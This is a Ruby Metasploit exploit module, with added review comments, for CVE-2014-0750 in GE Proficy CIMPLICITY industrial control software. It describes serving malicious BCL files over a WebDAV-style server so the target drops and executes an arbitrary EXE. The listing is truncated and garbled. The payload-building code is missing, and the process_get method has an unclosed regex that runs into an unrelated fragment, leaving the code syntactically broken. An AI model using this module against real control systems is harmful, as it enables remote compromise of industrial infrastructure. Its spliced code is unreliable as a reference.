##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

# Metasploit exploit module for the GE Proficy CIMPLICITY gefebt.exe issue
# (CVE-2014-0750 / ZDI-14-015, see 'References' below).
#
# As the 'Description' states, the module serves malicious BCL files from its
# own HTTP server (the WebDAV-style OPTIONS/PROPFIND/GET dispatch is in
# on_request_uri) or, with ONLYMAKE, only writes them to disk for use with an
# external SMB share. The generated files are persisted through file_create.
#
# NOTE(review): the pasted listing is truncated — everything between the
# regex opened in process_get and the fragment ending in send_request_cgi is
# missing, so the handlers named in on_request_uri (process_options,
# process_propfind, the rest of process_get) and exploit_bcl are not visible
# here. Nothing below documents what those missing parts do.
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Auxiliary::Report               # store_local (used by file_create)
  include Msf::Exploit::EXE                    # presumably generates the dropped EXE — TODO confirm in the missing part
  include Msf::Exploit::Remote::HttpClient     # send_request_cgi (used in the truncated fragment)
  include Msf::Exploit::Remote::HttpServer::HTML # on_request_uri / create_response / primer hooks

  # Registers module metadata and datastore options.
  #
  # Only 'Jan 23 2014' and the CIMPLICITY 7.5 embedded CimWebServer target are
  # declared; 'Stance' is Aggressive and the module is flagged 'Privileged'.
  def initialize
    super(
      'Name'           => 'GE Proficy CIMPLICITY gefebt.exe Remote Code Execution',
      'Description'    => %q{
        This module abuses the gefebt.exe component in GE Proficy CIMPLICITY, reachable through the
        CIMPLICIY CimWebServer. The vulnerable component allows to execute remote BCL files in
        shared resources. An attacker can abuse this behaviour to execute a malicious BCL and drop
        an arbitrary EXE. The last one can be executed remotely through the WebView server. This
        module has been tested successfully in GE Proficy CIMPLICITY 7.5 with the embedded
        CimWebServer. This module starts a WebDAV server to provide the malicious BCL files. When
        the target hasn't the WebClient service enabled, an external SMB service is necessary.
      },
      'Author'         =>
        [
          'amisto0x07', # Vulnerability discovery
          'Z0mb1E', # Vulnerability discovery
          'juan vazquez' # Metasploit module
        ],
      'References'     =>
        [
          [ 'CVE', '2014-0750'],
          [ 'ZDI', '14-015' ],
          [ 'URL', 'http://ics-cert.us-cert.gov/advisories/ICSA-14-023-01' ]
        ],
      'Stance'         => Msf::Exploit::Stance::Aggressive,
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'GE Proficy CIMPLICITY 7.5 (embedded CimWebServer)', { } ]
        ],
      'DefaultTarget'  => 0,
      'Privileged'     => true,
      'DisclosureDate' => 'Jan 23 2014'
    )

    register_options(
      [
        Opt::RPORT(80),
        # URIPATH and SRVPORT are pinned ('/' and 80) — the option text itself
        # says not to change them; the served WebDAV root must match what the
        # target is pointed at.
        OptString.new('URIPATH', [ true, 'The URI to use (do not change)', '/' ]),
        OptPort.new('SRVPORT', [ true, 'The daemon port to listen on (do not change)', 80 ]),
        # Optional: override the UNC path (no default; how it is consumed is in the missing part).
        OptString.new('UNCPATH', [ false, 'Override the UNC path to use.' ]),
        # Defaults to true: by default the module only generates the BCL files
        # (for an external SMB server) rather than relying on its own server.
        OptBool.new('ONLYMAKE', [ false, 'Just generate the malicious BCL files for using with an external SMB server.', true ]),
        OptString.new('TARGETURI', [true, 'The base path to the CimWeb', '/'])
      ], self.class)
  end

  # HttpServer request hook: dispatches on the HTTP method.
  #
  # OPTIONS and PROPFIND (the WebDAV discovery methods) and GET each go to a
  # dedicated handler; any other method gets an empty 404 so the server does
  # not reveal anything beyond the WebDAV surface it emulates.
  #
  # @param cli     the client connection the response is sent on
  # @param request the parsed HTTP request (method and uri are read here)
  def on_request_uri(cli, request)
    case request.method
    when 'OPTIONS'
      process_options(cli, request)
    when 'PROPFIND'
      process_propfind(cli, request)
    when 'GET'
      process_get(cli, request)
    else
      vprint_status("#{request.method} => 404 (#{request.uri})")
      resp = create_response(404, "Not Found")
      resp.body = ""
      resp['Content-Type'] = 'text/html'
      cli.send_response(resp)
    end
  end

  # NOTE(review): TRUNCATED IN THE PASTED SOURCE. The regex literal below is
  # never closed in this listing; the text between it and "# @exe_filename)"
  # was lost on extraction. The tail (uri << "?" ... send_request_cgi) reads
  # like the end of a different method that triggers the dropped EXE through
  # the web server with a 3-second timeout — its signature is not visible, so
  # treat the whole span as unknown rather than as process_get's body.
  def process_get(cli, request)
    if request.uri =~ /# @exe_filename)
      uri << "?"
      # Enough timeout to execute the payload, but don't block the exploit
      # until there is an answer.
      send_request_cgi({'uri' => uri}, 3)
  end

  # HttpServer hook run once the server is up (NOTE(review): confirm the exact
  # timing against the mixin). Runs exploit_bcl — defined in the part of the
  # file missing from this listing — and then stops the HTTP service, i.e. the
  # server is only kept alive for the duration of that one step.
  def primer
    exploit_bcl
    service.stop
  end

  # Persists generated file data into the local loot store.
  #
  # @param fname [String] file name to store the data under
  # @param data  [String] file contents
  # Stores under the "exploit.fileformat.<module shortname>" loot type and
  # prints the resulting path.
  def file_create(fname, data)
    ltype = "exploit.fileformat.#{self.shortname}"
    full_path = store_local(ltype, nil, data, fname)
    print_good("#{fname} stored at #{full_path}")
  end
end